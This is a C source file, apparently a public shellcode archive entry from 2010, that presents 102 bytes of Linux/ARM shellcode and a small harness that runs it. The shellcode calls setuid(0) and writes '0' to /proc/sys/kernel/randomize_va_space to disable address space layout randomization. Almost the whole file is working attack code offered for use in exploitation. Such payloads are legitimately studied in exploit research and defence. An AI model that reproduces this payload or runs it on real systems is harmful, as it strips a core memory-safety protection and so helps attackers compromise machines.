/*
Title: Linux/ARM - Disable ASLR Security - 102 bytes
Date: 2010-06-20
Tested: Linux ARM9 2.6.28-6-versatile
Author: Jonathan Salwan
Web: http://shell-storm.org | http://twitter.com/jonathansalwan
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Description:
============
Address space layout randomization (ASLR) is a computer security technique
which involves randomly arranging the positions of key data areas, usually
including the base of the executable and position of libraries, heap, and
stack, in a process's address space.
This shellcode disables the ASLR on linux/ARM
*/
#include <stdio.h>
char *SC = "\x01\x30\x8f\xe2" // add r3, pc, #1
"\x13\xff\x2f\xe1" // bx r3
"\x24\x1b" // subs r4, r4, r4
"\x20\x1c" // adds r0, r4, #0
"\x17\x27" // movs r7, #23
"\x01\xdf" // svc 1
"\x78\x46" // mov r0, pc
"\x2e\x30" // adds r0, #46
"\xc8\x21" // movs r1, #200
"\xc8\x31" // adds r1, #200
"\xc8\x31" // adds r1, #200
"\xc8\x31" // adds r1, #200
"\xc8\x31" // adds r1, #200
"\x59\x31" // adds r1, #89
"\xc8\x22" // movs r2, #200
"\xc8\x32" // adds r2, #200
"\x14\x32" // adds r2, #20
"\x05\x27" // movs r7, #5
"\x01\xdf" // svc 1
"\x03\x20" // movs r0, #3
"\x79\x46" // mov r1, pc
"\x0e\x31" // adds r1, #14
"\x02\x22" // movs r2, #2
"\x04\x27" // movs r7, #4
"\x01\xdf" // svc 1
"\x92\x1a" // subs r2, r2, r2
"\x10\x1c" // adds r0, r2, #0
"\x01\x27" // movs r7, #1
"\x01\xdf" // svc 1
"\x30\x0a" // ^
"\x2d\x2d" // |
"\x2f\x2f" // |
"\x70\x72" // |
"\x6f\x63" // |
"\x2f\x73" // |
"\x79\x73" // |
"\x2f\x6b" // |
"\x65\x72" // |
"\x6e\x65" // | [ strings ]
"\x6c\x2f" // |
"\x72\x61" // |
"\x6e\x64" // |
"\x6f\x6d" // |
"\x69\x7a" // |
"\x65\x5f" // |
"\x76\x61" // |
"\x5f\x73" // |
"\x70\x61" // |
"\x63\x65"; // v
int main(void)
{
fprintf(stdout,"Length: %d\n",strlen(SC));
(*(void(*)()) SC)();
return 0;
}
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